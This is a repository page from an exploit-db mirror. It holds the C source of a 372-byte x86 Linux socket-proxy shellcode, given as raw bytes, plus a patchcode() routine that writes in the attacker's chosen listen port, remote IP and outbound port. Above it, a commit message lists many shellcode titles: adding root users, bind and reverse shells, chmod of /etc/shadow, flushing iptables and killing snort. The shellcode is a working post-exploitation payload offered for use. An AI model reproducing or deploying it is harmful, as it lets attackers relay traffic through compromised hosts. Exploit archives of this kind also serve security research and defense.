bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/generator/43672.c
Offensive Security 1db36d5e8b DB: 2018-01-18 
76 changes to exploits/shellcodes

Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion
Microsoft Edge Chakra - Incorrect Scope Handling
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Microsoft Edge Chakra JIT - Out-of-Bounds Write
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
Transmission - RPC DNS Rebinding
Master IP CAM 01 - Multiple Vulnerabilities
Zomato Clone Script - Arbitrary File Upload
Reservo Image Hosting Script 1.5 - Cross-Site Scripting
D-Link DSL-2640R - Unauthenticated DNS Change
Belkin N600DB Wireless Router - Multiple Vulnerabilities
SugarCRM 3.5.1 - Cross-Site Scripting

Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)

Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)

Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)
Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)

Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes)

Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)
Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)

Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)

Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)

Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)
Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)

Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)

Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)

Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)

Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)

Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)

Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)

Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)

Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)
Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)
Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)

FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)

Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)
Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode

Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)
Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)

Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)

Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)
Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)
Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)
Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)
Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)
Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)
Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)
Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)
Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)
Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)
Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - CDRom Ejecting Shellcode (46 bytes)
Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)
Linux/x86 - exit(0) Shellcode (8 bytes)
Linux/x86 - sync Shellcode (6 bytes)
Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)
Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)
Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)
Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)
Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)
Linux/x86 - setreuid() + /sbin/iptables -F + exit(0) Shellcode (76 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)
Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)
Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)
Linux/x86 - iptables --flush Shellcode (43 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)
Linux/x86 - Force Reboot Shellcode (36 bytes)
Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
2018-01-18 05:02:25 +00:00

69 lines
No EOL
3.5 KiB
C
Raw Blame History

/*---------------------------------------------------------------------------*
* 372 byte socket-proxy shellcode *
* by Russell Sanford - xort@tty64.org *
*---------------------------------------------------------------------------*
* filename: x86-linux-bounce-proxy.c *
* date: 12/23/2005 *
* info: Compiled with DTP Project. *
* discription: This is a x86-linux proxy shellcode. This is probably best *
* used in stage 2 situations. The syntax for invoking the *
* patchcode is as follows: *
* *
* patchcode(shellcode,31337,"11.22.33.44",80); *
* *
* Where 31337 is the port to listen to on the remote host *
*---------------------------------------------------------------------------*/
char shellcode[] =
"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd"
"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea"
"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01"
"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0"
"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b"
"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1"
"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8"
"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2"
"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff"
"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c"
"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c"
"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88";
int find_safe_offset(int INT_A) {
int INT_B=0;
do {
INT_A -= 0x01010101; INT_B += 0x01010101;
}
while ( ((INT_A & 0x000000ff) == 0) ||
((INT_A & 0x0000ff00) == 0) ||
((INT_A & 0x00ff0000) == 0) ||
((INT_A & 0xff000000) == 0) );
return INT_B;
}
void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) {
int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2);
int PORT_IN_B = find_safe_offset(PORT_IN_A);
int IP_A = inet_addr(IP);
int IP_B = find_safe_offset(IP_A);
int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2);
int PORT_OUT_B = find_safe_offset(PORT_OUT_A);
*(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B);
*(int *)&shellcode[141] = PORT_IN_B;
*(int *)&shellcode[205] = (IP_A - IP_B);
*(int *)&shellcode[212] = IP_B;
*(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B);
*(int *)&shellcode[224] = PORT_OUT_B;
}
Reference in a new issue View git blame Copy permalink